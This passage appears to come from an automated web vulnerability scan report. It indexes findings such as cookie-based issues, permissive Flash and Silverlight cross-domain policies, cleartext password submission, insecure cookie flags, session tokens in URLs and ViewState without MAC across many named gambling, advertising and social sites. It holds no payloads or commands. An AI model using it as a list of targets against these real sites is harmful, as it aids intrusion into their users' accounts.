3.390. http://www.scratch2cash.com/Promotions.aspx [BO cookie]

3.391. http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie]

3.392. http://www.scratch2cash.com/Responsible.aspx [BO cookie]

3.393. http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie]

3.394. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie]

3.395. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.396. http://www.scratch2cash.com/Sitemap.aspx [BO cookie]

3.397. http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie]

3.398. http://www.scratch2cash.com/Terms.aspx [BO cookie]

3.399. http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie]

3.400. http://www.scratch2cash.com/UnderAge.aspx [BO cookie]

3.401. http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie]

3.402. http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie]

3.403. http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie]

3.404. http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie]

3.405. http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie]

3.406. http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie]

3.407. http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie]

3.408. http://www.scratchcardheaven.com/Help.aspx [BO cookie]

3.409. http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie]

3.410. http://www.scratchcardheaven.com/Home.aspx [BO cookie]

3.411. http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie]

3.412. http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie]

3.413. http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie]

3.414. http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie]

3.415. http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie]

3.416. http://www.scratchcardheaven.com/Promotions.aspx [BO cookie]

3.417. http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie]

3.418. http://www.scratchcardheaven.com/Responsible.aspx [BO cookie]

3.419. http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie]

3.420. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie]

3.421. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.422. http://www.scratchcardheaven.com/Terms.aspx [BO cookie]

3.423. http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie]

3.424. http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie]

3.425. http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie]

3.426. http://www.svenskalotter.com/ [BO cookie]

3.427. http://www.svenskalotter.com/ [RegistrationMode cookie]

3.428. http://www.svenskalotter.com/AboutUs.aspx [BO cookie]

3.429. http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie]

3.430. http://www.svenskalotter.com/Affiliates.aspx [BO cookie]

3.431. http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie]

3.432. http://www.svenskalotter.com/Charity.aspx [BO cookie]

3.433. http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie]

3.434. http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie]

3.435. http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie]

3.436. http://www.svenskalotter.com/FairPlay.aspx [BO cookie]

3.437. http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie]

3.438. http://www.svenskalotter.com/Help.aspx [BO cookie]

3.439. http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie]

3.440. http://www.svenskalotter.com/InviteFriend.aspx [BO cookie]

3.441. http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie]

3.442. http://www.svenskalotter.com/PlayersClub.aspx [BO cookie]

3.443. http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie]

3.444. http://www.svenskalotter.com/Promotions.aspx [BO cookie]

3.445. http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie]

3.446. http://www.svenskalotter.com/Responsible.aspx [BO cookie]

3.447. http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie]

3.448. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie]

3.449. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.450. http://www.svenskalotter.com/Terms.aspx [BO cookie]

3.451. http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie]

3.452. http://www.svenskalotter.com/UnderAge.aspx [BO cookie]

3.453. http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie]

3.454. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie]

3.455. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie]

3.456. http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie]

3.457. http://www.winnings.com/how-to-win-money [winnings[vid] cookie]

3.458. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

3.459. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

3.460. http://www.winnings.com/instant-games [winnings[vid] cookie]

3.461. http://www.winnings.com/lottery-scratch-cards [winnings[sessionId] cookie]

3.462. http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie]

3.463. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

3.464. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

3.465. http://www.winnings.com/scratch-cards [winnings[vid] cookie]

3.466. http://www.winnings.com/site-map [winnings[vid] cookie]

3.467. http://www.winnings.com/slots [winnings[sessionId] cookie]

3.468. http://www.winnings.com/slots [winnings[sessionId] cookie]

3.469. http://www.winnings.com/slots [winnings[vid] cookie]

4. Flash cross-domain policy

4.1. http://ad-emea.doubleclick.net/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://b.scorecardresearch.com/crossdomain.xml

4.4. http://bingo.bet365.com/crossdomain.xml

4.5. https://bingo.betsson.com/crossdomain.xml

4.6. http://c.betrad.com/crossdomain.xml

4.7. http://casino.bet365.com/crossdomain.xml

4.8. http://d.tradex.openx.com/crossdomain.xml

4.9. http://d.xp1.ru4.com/crossdomain.xml

4.10. http://games.bet365.com/crossdomain.xml

4.11. http://getclicky.com/crossdomain.xml

4.12. http://in.getclicky.com/crossdomain.xml

4.13. https://in.getclicky.com/crossdomain.xml

4.14. http://l.betrad.com/crossdomain.xml

4.15. http://log30.doubleverify.com/crossdomain.xml

4.16. http://m.xp1.ru4.com/crossdomain.xml

4.17. http://neogames-tech.com/crossdomain.xml

4.18. http://pixel.invitemedia.com/crossdomain.xml

4.19. http://pixel.quantserve.com/crossdomain.xml

4.20. http://platform.ak.fbcdn.net/crossdomain.xml

4.21. http://poker.bet365.com/crossdomain.xml

4.22. http://res.mccont.com/crossdomain.xml

4.23. http://s.mcstatic.com/crossdomain.xml

4.24. http://s0.2mdn.net/crossdomain.xml

4.25. http://s1.mcstatic.com/crossdomain.xml

4.26. http://s3.mcstatic.com/crossdomain.xml

4.27. http://s4.mcstatic.com/crossdomain.xml

4.28. http://s6.mcstatic.com/crossdomain.xml

4.29. http://secure-us.imrworldwide.com/crossdomain.xml

4.30. http://spe.atdmt.com/crossdomain.xml

4.31. http://static.getclicky.com/crossdomain.xml

4.32. https://static.getclicky.com/crossdomain.xml

4.33. http://va.px.invitemedia.com/crossdomain.xml

4.34. http://winter.metacafe.com/crossdomain.xml

4.35. https://www.betsson.com/crossdomain.xml

4.36. http://www.huddletogether.com/crossdomain.xml

4.37. http://www.metacafe.com/crossdomain.xml

4.38. http://www.neogames.com/crossdomain.xml

4.39. http://bigmoneyscratch.com/crossdomain.xml

4.40. http://br.bigmoneyscratch.com/crossdomain.xml

4.41. http://br.karamba.com/crossdomain.xml

4.42. http://da.bigmoneyscratch.com/crossdomain.xml

4.43. http://da.crazyscratch.com/crossdomain.xml

4.44. http://da.karamba.com/crossdomain.xml

4.45. http://da.scratch2cash.com/crossdomain.xml

4.46. http://da.scratchcardheaven.com/crossdomain.xml

4.47. http://de.bigmoneyscratch.com/crossdomain.xml

4.48. http://de.crazyscratch.com/crossdomain.xml

4.49. http://de.karamba.com/crossdomain.xml

4.50. http://de.scratch2cash.com/crossdomain.xml

4.51. http://de.scratchcardheaven.com/crossdomain.xml

4.52. http://download.neogames-tech.com/crossdomain.xml

4.53. https://download.neogames-tech.com/crossdomain.xml

4.54. http://el.crazyscratch.com/crossdomain.xml

4.55. http://el.karamba.com/crossdomain.xml

4.56. http://en.bigmoneyscratch.com/crossdomain.xml

4.57. http://en.crazyscratch.com/crossdomain.xml

4.58. http://en.info.winnings.com/crossdomain.xml

4.59. http://en.karamba.com/crossdomain.xml

4.60. http://en.scratch2cash.com/crossdomain.xml

4.61. http://en.scratchcardheaven.com/crossdomain.xml

4.62. http://es.bigmoneyscratch.com/crossdomain.xml

4.63. http://es.crazyscratch.com/crossdomain.xml

4.64. http://es.karamba.com/crossdomain.xml

4.65. http://es.scratch2cash.com/crossdomain.xml

4.66. http://es.scratchcardheaven.com/crossdomain.xml

4.67. http://feeds.bbci.co.uk/crossdomain.xml

4.68. http://fi.bigmoneyscratch.com/crossdomain.xml

4.69. http://fi.crazyscratch.com/crossdomain.xml

4.70. http://fi.karamba.com/crossdomain.xml

4.71. http://fi.scratchcardheaven.com/crossdomain.xml

4.72. http://fr.bigmoneyscratch.com/crossdomain.xml

4.73. http://fr.crazyscratch.com/crossdomain.xml

4.74. http://fr.karamba.com/crossdomain.xml

4.75. http://fr.scratch2cash.com/crossdomain.xml

4.76. http://fr.scratchcardheaven.com/crossdomain.xml

4.77. http://home.okscratchcards.com/crossdomain.xml

4.78. http://hu.crazyscratch.com/crossdomain.xml

4.79. http://it.bigmoneyscratch.com/crossdomain.xml

4.80. http://it.crazyscratch.com/crossdomain.xml

4.81. http://it.karamba.com/crossdomain.xml

4.82. http://it.scratch2cash.com/crossdomain.xml

4.83. http://it.scratchcardheaven.com/crossdomain.xml

4.84. http://itunes.apple.com/crossdomain.xml

4.85. http://karamba.com/crossdomain.xml

4.86. http://mundirasca.com/crossdomain.xml

4.87. http://nettiarpa.com/crossdomain.xml

4.88. http://newsrss.bbc.co.uk/crossdomain.xml

4.89. http://nl.bigmoneyscratch.com/crossdomain.xml

4.90. http://nl.crazyscratch.com/crossdomain.xml

4.91. http://nl.karamba.com/crossdomain.xml

4.92. http://nl.scratch2cash.com/crossdomain.xml

4.93. http://nl.scratchcardheaven.com/crossdomain.xml

4.94. http://no.bigmoneyscratch.com/crossdomain.xml

4.95. http://no.crazyscratch.com/crossdomain.xml

4.96. http://no.karamba.com/crossdomain.xml

4.97. http://no.scratchcardheaven.com/crossdomain.xml

4.98. http://optimized-by.rubiconproject.com/crossdomain.xml

4.99. http://pagead2.googlesyndication.com/crossdomain.xml

4.100. http://primescratchcards.com/crossdomain.xml

4.101. http://pt.bigmoneyscratch.com/crossdomain.xml

4.102. http://pt.crazyscratch.com/crossdomain.xml

4.103. http://pt.karamba.com/crossdomain.xml

4.104. http://pt.scratch2cash.com/crossdomain.xml

4.105. http://pt.scratchcardheaven.com/crossdomain.xml

4.106. http://pubads.g.doubleclick.net/crossdomain.xml

4.107. https://secure.neogames-tech.com/crossdomain.xml

4.108. http://server.iad.liveperson.net/crossdomain.xml

4.109. http://static.ak.fbcdn.net/crossdomain.xml

4.110. http://sv.bigmoneyscratch.com/crossdomain.xml

4.111. http://sv.crazyscratch.com/crossdomain.xml

4.112. http://sv.karamba.com/crossdomain.xml

4.113. http://sv.scratch2cash.com/crossdomain.xml

4.114. http://sv.scratchcardheaven.com/crossdomain.xml

4.115. http://svenskalotter.com/crossdomain.xml

4.116. http://video.google.com/crossdomain.xml

4.117. http://www.adobe.com/crossdomain.xml

4.118. http://www.apple.com/crossdomain.xml

4.119. http://www.bigmoneyscratch.com/crossdomain.xml

4.120. http://www.crazyscratch.com/crossdomain.xml

4.121. http://www.facebook.com/crossdomain.xml

4.122. http://www.hopa.com/crossdomain.xml

4.123. http://www.info.crazyscratch.com/crossdomain.xml

4.124. http://www.info.winnings.com/crossdomain.xml

4.125. http://www.karamba.com/crossdomain.xml

4.126. http://www.maestrocard.com/crossdomain.xml

4.127. http://www.mundirasca.com/crossdomain.xml

4.128. http://www.pclscratch.com/crossdomain.xml

4.129. http://www.primegrattage.com/crossdomain.xml

4.130. http://www.primescratchcards.com/crossdomain.xml

4.131. http://www.scratch2cash.com/crossdomain.xml

4.132. http://www.scratchcardheaven.com/crossdomain.xml

4.133. http://www.svenskalotter.com/crossdomain.xml

4.134. http://www.youtube.com/crossdomain.xml

4.135. http://api.twitter.com/crossdomain.xml

4.136. https://casino.betsson.com/crossdomain.xml

4.137. https://games.betsson.com/crossdomain.xml

4.138. https://livecasino.betsson.com/crossdomain.xml

4.139. http://members.bet365.com/crossdomain.xml

4.140. https://members.bet365.com/crossdomain.xml

4.141. https://poker.betsson.com/crossdomain.xml

4.142. https://scratch.betsson.com/crossdomain.xml

4.143. http://twitter.com/crossdomain.xml

4.144. https://www.norskelodd.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.doubleclick.net/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.4. http://s0.2mdn.net/clientaccesspolicy.xml

5.5. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.6. http://spe.atdmt.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://affiliates.interwetten.com/

6.2. http://bingo.bet365.com/play/en/home/

6.3. http://casino.bet365.com/extra/en/online-games/baccarat

6.4. http://casino.bet365.com/extra/en/online-games/blackjack

6.5. http://casino.bet365.com/extra/en/online-games/live-dealer

6.6. http://casino.bet365.com/extra/en/online-games/roulette

6.7. http://casino.bet365.com/home/en/

6.8. http://games.bet365.com/home/en/

6.9. http://poker.bet365.com/home/en/

6.10. http://www.bet365.com/extra/en/betting/in-play

6.11. http://www.bet365.com/extra/en/betting/live-streaming

6.12. http://www.bet365.com/extra/en/mobile/introduction/

6.13. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

6.14. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

6.15. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

6.16. http://www.crazyrewards.com/

6.17. http://www.facebook.com/

6.18. http://www.heavenaffiliates.com/

6.19. http://www.postcodelottery.com/MyAccount.htm

6.20. http://www.tstglobal.com/

7. SSL cookie without secure flag set

7.1. https://bingo.betsson.com/en/

7.2. https://help.betsson.com/display/4/kb/faq/index.aspx

7.3. https://members.bet365.com/members/chat/

7.4. https://poker.betsson.com/en/

7.5. https://scratch.betsson.com/en/

7.6. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

7.7. https://www.betsson.com/en/about/

7.8. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

7.9. https://www.betsson.com/en/customer-service/

7.10. https://www.betsson.com/en/customer-service/forgotten-password/

7.11. https://www.betsson.com/en/customer-service/privacy-statement/

7.12. https://www.betsson.com/en/customer-service/responsible-gaming/

7.13. https://www.betsson.com/en/customer-service/terms/index.asp

7.14. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

7.15. https://www.betsson.com/my-account/refer-a-friend/index.asp

7.16. https://www.betsson.com/web/en/sportsbook/

7.17. https://www.interwetten.com/en/Default.aspx

7.18. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

7.19. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

7.20. https://www.betsson.com/start/en/

7.21. https://www.betsson.com/start/is/

7.22. https://www.interwetten.com/

7.23. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

7.24. https://www.thawte.com/

8. Session token in URL

8.1. http://www.facebook.com/extern/login_status.php

8.2. http://www.heavenaffiliates.com/

8.3. http://www.metacafe.com/fplayer/

8.4. http://www.youtube.com/user/CrazyScratchCom

8.5. http://www.youtube.com/user/PostcodeLottery

8.6. http://www.youtube.com/user/primescratchcards1

9. SSL certificate

9.1. https://clicktale.pantherssl.com/

9.2. https://www.aspireaffiliates.com/

9.3. https://www.thawte.com/

9.4. https://help.betsson.com/

9.5. https://bingo.betsson.com/

9.6. https://ble.hs.llnwd.net/

9.7. https://casino.betsson.com/

9.8. https://download.macromedia.com/

9.9. https://download.neogames-tech.com/

9.10. https://games.betsson.com/

9.11. https://in.getclicky.com/

9.12. https://livecasino.betsson.com/

9.13. https://members.bet365.com/

9.14. https://poker.betsson.com/

9.15. https://scratch.betsson.com/

9.16. https://seal.verisign.com/

9.17. https://sealinfo.verisign.com/

9.18. https://secure.neogames-tech.com/

9.19. https://static.getclicky.com/

9.20. https://www.betsson.com/

9.21. https://www.interwetten.com/

9.22. https://www.macromedia.com/

9.23. https://www.neogamespartners.com/

9.24. https://www.norskelodd.com/

9.25. https://www.postcodelottery.com/

10. ASP.NET ViewState without MAC enabled

10.1. http://www.lga.org.mt/lga/content.aspx

10.2. http://www.lga.org.mt/lga/home.aspx

11. Cookie scoped to parent domain

11.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

11.2. http://br.winnings.com/

11.3. http://da.winnings.com/

11.4. http://de.winnings.com/

11.5. http://el.winnings.com/

11.6. http://es.winnings.com/

11.7. http://fi.winnings.com/

11.8. http://fr.winnings.com/

11.9. http://nl.winnings.com/

11.10. http://no.winnings.com/

11.11. http://pt.winnings.com/

11.12. http://sv.winnings.com/

11.13. http://www.metacafe.com/fplayer/

11.14. http://www.opensource.org/licenses/mit-license.php

11.15. http://www.vincite.net/

11.16. http://www.winnings.com/

11.17. http://www.winnings.com/xmlrpc.php

11.18. http://b.scorecardresearch.com/b

11.19. http://bid.openx.net/json

11.20. http://br.bigmoneyscratch.com/Home.aspx

11.21. http://br.karamba.com/Home.aspx

11.22. http://da.bigmoneyscratch.com/Home.aspx

11.23. http://da.karamba.com/Home.aspx

11.24. http://da.scratch2cash.com/Home.aspx

11.25. http://da.scratchcardheaven.com/Home.aspx

11.26. http://de.bigmoneyscratch.com/Home.aspx

11.27. http://de.karamba.com/Home.aspx

11.28. http://de.scratch2cash.com/Home.aspx

11.29. http://de.scratchcardheaven.com/Home.aspx

11.30. http://el.karamba.com/Home.aspx

11.31. http://es.bigmoneyscratch.com/Home.aspx

11.32. http://es.karamba.com/Home.aspx

11.33. http://es.scratch2cash.com/Home.aspx

11.34. http://es.scratchcardheaven.com/Home.aspx

11.35. http://fi.bigmoneyscratch.com/Home.aspx

11.36. http://fi.karamba.com/Home.aspx

11.37. http://fi.scratchcardheaven.com/Home.aspx

11.38. http://fr.bigmoneyscratch.com/Home.aspx

11.39. http://fr.karamba.com/Home.aspx

11.40. http://fr.scratch2cash.com/Home.aspx

11.41. http://fr.scratchcardheaven.com/Home.aspx

11.42. http://home.okscratchcards.com/AboutUs.aspx

11.43. http://home.okscratchcards.com/ContactUsMail.aspx

11.44. http://home.okscratchcards.com/FairPlay.aspx

11.45. http://home.okscratchcards.com/PlayersClub.aspx

11.46. http://home.okscratchcards.com/Promotions.aspx

11.47. http://home.okscratchcards.com/Responsible.aspx

11.48. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

11.49. http://home.okscratchcards.com/Terms.aspx

11.50. http://home.okscratchcards.com/help.aspx

11.51. http://home.okscratchcards.com/visit.aspx

11.52. http://it.bigmoneyscratch.com/Home.aspx

11.53. http://it.karamba.com/Home.aspx

11.54. http://it.scratch2cash.com/Home.aspx

11.55. http://it.scratchcardheaven.com/Home.aspx

11.56. http://m.xp1.ru4.com/ad

11.57. http://nl.bigmoneyscratch.com/Home.aspx

11.58. http://nl.karamba.com/Home.aspx

11.59. http://nl.scratch2cash.com/Home.aspx

11.60. http://nl.scratchcardheaven.com/Home.aspx

11.61. http://no.bigmoneyscratch.com/Home.aspx

11.62. http://no.karamba.com/Home.aspx

11.63. http://no.scratchcardheaven.com/Home.aspx

11.64. http://pixel.invitemedia.com/data_sync

11.65. http://pixel.quantserve.com/pixel

11.66. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

11.67. http://pt.bigmoneyscratch.com/Home.aspx

11.68. http://pt.karamba.com/Home.aspx

11.69. http://pt.scratch2cash.com/Home.aspx

11.70. http://pt.scratchcardheaven.com/Home.aspx

11.71. http://server.iad.liveperson.net/hc/15712222/

11.72. http://solutions.liveperson.com/ref/lppb.asp

11.73. http://sv.bigmoneyscratch.com/Home.aspx

11.74. http://sv.karamba.com/Home.aspx

11.75. http://sv.scratch2cash.com/Home.aspx

11.76. http://sv.scratchcardheaven.com/Home.aspx

11.77. http://va.px.invitemedia.com/goog_imp

11.78. http://winter.metacafe.com/Openx/www/delivery/lg.php

11.79. http://www.bigmoneyscratch.com/

11.80. http://www.bigmoneyscratch.com/AboutUs.aspx

11.81. http://www.bigmoneyscratch.com/Affiliates.aspx

11.82. http://www.bigmoneyscratch.com/ContactUsChat.aspx

11.83. http://www.bigmoneyscratch.com/ContactUsFax.aspx

11.84. http://www.bigmoneyscratch.com/ContactUsMail.aspx

11.85. http://www.bigmoneyscratch.com/ContactUsTel.aspx

11.86. http://www.bigmoneyscratch.com/FAQ.aspx

11.87. http://www.bigmoneyscratch.com/FairPlay.aspx

11.88. http://www.bigmoneyscratch.com/Help.aspx

11.89. http://www.bigmoneyscratch.com/Home.aspx

11.90. http://www.bigmoneyscratch.com/InviteFriend.aspx

11.91. http://www.bigmoneyscratch.com/Mobile.aspx

11.92. http://www.bigmoneyscratch.com/PlayersClub.aspx

11.93. http://www.bigmoneyscratch.com/Promotions.aspx

11.94. http://www.bigmoneyscratch.com/Responsible.aspx

11.95. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

11.96. http://www.bigmoneyscratch.com/Terms.aspx

11.97. http://www.bigmoneyscratch.com/UnderAge.aspx

11.98. http://www.facebook.com/

11.99. http://www.facebook.com/PrimeScratchCards

11.100. http://www.facebook.com/WinningsCom

11.101. http://www.facebook.com/crazyscratch

11.102. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

11.103. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

11.104. http://www.facebook.com/peoplespostcodelottery

11.105. http://www.hopa.com/

11.106. http://www.hopa.com/visit.aspx

11.107. http://www.info.crazyscratch.com/AboutUs.aspx

11.108. http://www.info.crazyscratch.com/ContactUsFax.aspx

11.109. http://www.info.crazyscratch.com/ContactUsMail.aspx

11.110. http://www.info.crazyscratch.com/ContactUsTel.aspx

11.111. http://www.info.crazyscratch.com/FairPlay.aspx

11.112. http://www.info.crazyscratch.com/Help.aspx

11.113. http://www.info.crazyscratch.com/InviteFriend.aspx

11.114. http://www.info.crazyscratch.com/PlayersClub.aspx

11.115. http://www.info.crazyscratch.com/Privacy.aspx

11.116. http://www.info.crazyscratch.com/Promotions.aspx

11.117. http://www.info.crazyscratch.com/Responsible.aspx

11.118. http://www.info.crazyscratch.com/Terms.aspx

11.119. http://www.info.crazyscratch.com/UnderAge.aspx

11.120. http://www.info.crazyscratch.com/visit.aspx

11.121. http://www.info.winnings.com/visit.aspx

11.122. http://www.karamba.com/

11.123. http://www.karamba.com/AboutUs.aspx

11.124. http://www.karamba.com/FairPlay.aspx

11.125. http://www.karamba.com/Help.aspx

11.126. http://www.karamba.com/Home.aspx

11.127. http://www.karamba.com/InviteFriend.aspx

11.128. http://www.karamba.com/PlayersClub.aspx

11.129. http://www.karamba.com/Privacy.aspx

11.130. http://www.karamba.com/Promotions.aspx

11.131. http://www.karamba.com/Responsible.aspx

11.132. http://www.karamba.com/Sitemap.aspx

11.133. http://www.karamba.com/Terms.aspx

11.134. http://www.karamba.com/UnderAge.aspx

11.135. http://www.karamba.com/click/Karamba.com/ENG/Home/

11.136. http://www.mundirasca.com/

11.137. http://www.mundirasca.com/AboutUs.aspx

11.138. http://www.mundirasca.com/ContactUsChat.aspx

11.139. http://www.mundirasca.com/ContactUsFax.aspx

11.140. http://www.mundirasca.com/ContactUsMail.aspx

11.141. http://www.mundirasca.com/ContactUsTel.aspx

11.142. http://www.mundirasca.com/FAQ.aspx

11.143. http://www.mundirasca.com/FairPlay.aspx

11.144. http://www.mundirasca.com/Help.aspx

11.145. http://www.mundirasca.com/Home.aspx

11.146. http://www.mundirasca.com/InviteFriend.aspx

11.147. http://www.mundirasca.com/PlayersClub.aspx

11.148. http://www.mundirasca.com/Promotions.aspx

11.149. http://www.mundirasca.com/Responsible.aspx

11.150. http://www.mundirasca.com/SecurityAndPrivacy.aspx

11.151. http://www.mundirasca.com/Terms.aspx

11.152. http://www.mundirasca.com/UnderAge.aspx

11.153. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

11.154. http://www.pclscratch.com/ContactUsMail.aspx

11.155. http://www.pclscratch.com/FairPlay.aspx

11.156. http://www.pclscratch.com/Promotions.aspx

11.157. http://www.pclscratch.com/Responsible.aspx

11.158. http://www.pclscratch.com/SecurityAndPrivacy.aspx

11.159. http://www.pclscratch.com/Terms.aspx

11.160. http://www.postcodelottery.com/AboutUs.htm

11.161. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

11.162. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

11.163. http://www.postcodelottery.com/Charities.htm

11.164. http://www.postcodelottery.com/DrawResults.htm

11.165. http://www.postcodelottery.com/FunGames.htm

11.166. http://www.postcodelottery.com/FunGames/FreeGames.htm

11.167. http://www.postcodelottery.com/FunGames/PaidGames.htm

11.168. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

11.169. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

11.170. http://www.postcodelottery.com/Games/Scratchcards.htm

11.171. http://www.postcodelottery.com/Home.htm

11.172. http://www.postcodelottery.com/HowItWorks.htm

11.173. http://www.postcodelottery.com/MyAccount.htm

11.174. http://www.postcodelottery.com/RSS.htm

11.175. http://www.postcodelottery.com/Sitemap.htm

11.176. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

11.177. http://www.primegrattage.com/

11.178. http://www.primescratchcards.com/

11.179. http://www.primescratchcards.com/HelpDepositMethods.asp

11.180. http://www.primescratchcards.com/InviteFriend.asp

11.181. http://www.primescratchcards.com/Responsible.asp

11.182. http://www.primescratchcards.com/SecurityAndPrivacy.asp

11.183. http://www.primescratchcards.com/aboutus.asp

11.184. http://www.primescratchcards.com/affiliates.asp

11.185. http://www.primescratchcards.com/contactus.asp

11.186. http://www.primescratchcards.com/fairplay.asp

11.187. http://www.primescratchcards.com/help.asp

11.188. http://www.primescratchcards.com/index.asp

11.189. http://www.primescratchcards.com/media.asp

11.190. http://www.primescratchcards.com/playersclub.asp

11.191. http://www.primescratchcards.com/promotions.asp

11.192. http://www.primescratchcards.com/terms.asp

11.193. http://www.primescratchcards.com/underage.asp

11.194. http://www.primescratchcards.com.br/

11.195. http://www.scratch2cash.com/

11.196. http://www.scratch2cash.com/AboutUs.aspx

11.197. http://www.scratch2cash.com/ContactUsMail.aspx

11.198. http://www.scratch2cash.com/FairPlay.aspx

11.199. http://www.scratch2cash.com/Help.aspx

11.200. http://www.scratch2cash.com/Home.aspx

11.201. http://www.scratch2cash.com/InviteFriend.aspx

11.202. http://www.scratch2cash.com/PlayersClub.aspx

11.203. http://www.scratch2cash.com/Promotions.aspx

11.204. http://www.scratch2cash.com/Responsible.aspx

11.205. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

11.206. http://www.scratch2cash.com/Sitemap.aspx

11.207. http://www.scratch2cash.com/Terms.aspx

11.208. http://www.scratch2cash.com/UnderAge.aspx

11.209. http://www.scratchcardheaven.com/

11.210. http://www.scratchcardheaven.com/AboutUs.aspx

11.211. http://www.scratchcardheaven.com/ContactUsMail.aspx

11.212. http://www.scratchcardheaven.com/FairPlay.aspx

11.213. http://www.scratchcardheaven.com/Help.aspx

11.214. http://www.scratchcardheaven.com/Home.aspx

11.215. http://www.scratchcardheaven.com/InviteFriend.aspx

11.216. http://www.scratchcardheaven.com/PlayersClub.aspx

11.217. http://www.scratchcardheaven.com/Promotions.aspx

11.218. http://www.scratchcardheaven.com/Responsible.aspx

11.219. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

11.220. http://www.scratchcardheaven.com/Terms.aspx

11.221. http://www.scratchcardheaven.com/UnderAge.aspx

11.222. http://www.svenskalotter.com/

11.223. http://www.svenskalotter.com/AboutUs.aspx

11.224. http://www.svenskalotter.com/Affiliates.aspx

11.225. http://www.svenskalotter.com/Charity.aspx

11.226. http://www.svenskalotter.com/ContactUsMail.aspx

11.227. http://www.svenskalotter.com/FairPlay.aspx

11.228. http://www.svenskalotter.com/Help.aspx

11.229. http://www.svenskalotter.com/Home.aspx

11.230. http://www.svenskalotter.com/InviteFriend.aspx

11.231. http://www.svenskalotter.com/PlayersClub.aspx

11.232. http://www.svenskalotter.com/Promotions.aspx

11.233. http://www.svenskalotter.com/Responsible.aspx

11.234. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

11.235. http://www.svenskalotter.com/Terms.aspx

11.236. http://www.svenskalotter.com/UnderAge.aspx

11.237. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

11.238. http://www.thawte.com/

11.239. https://www.thawte.com/

11.240. http://www.verisign.co.uk/

11.241. http://www.youtube.com/user/CrazyScratchCom

11.242. http://www.youtube.com/user/PostcodeLottery

11.243. http://www.youtube.com/user/primescratchcards1

11.244. http://www.youtube.com/v/

12. Cookie without HttpOnly flag set

12.1. http://bingo.bet365.com/play/en/home/

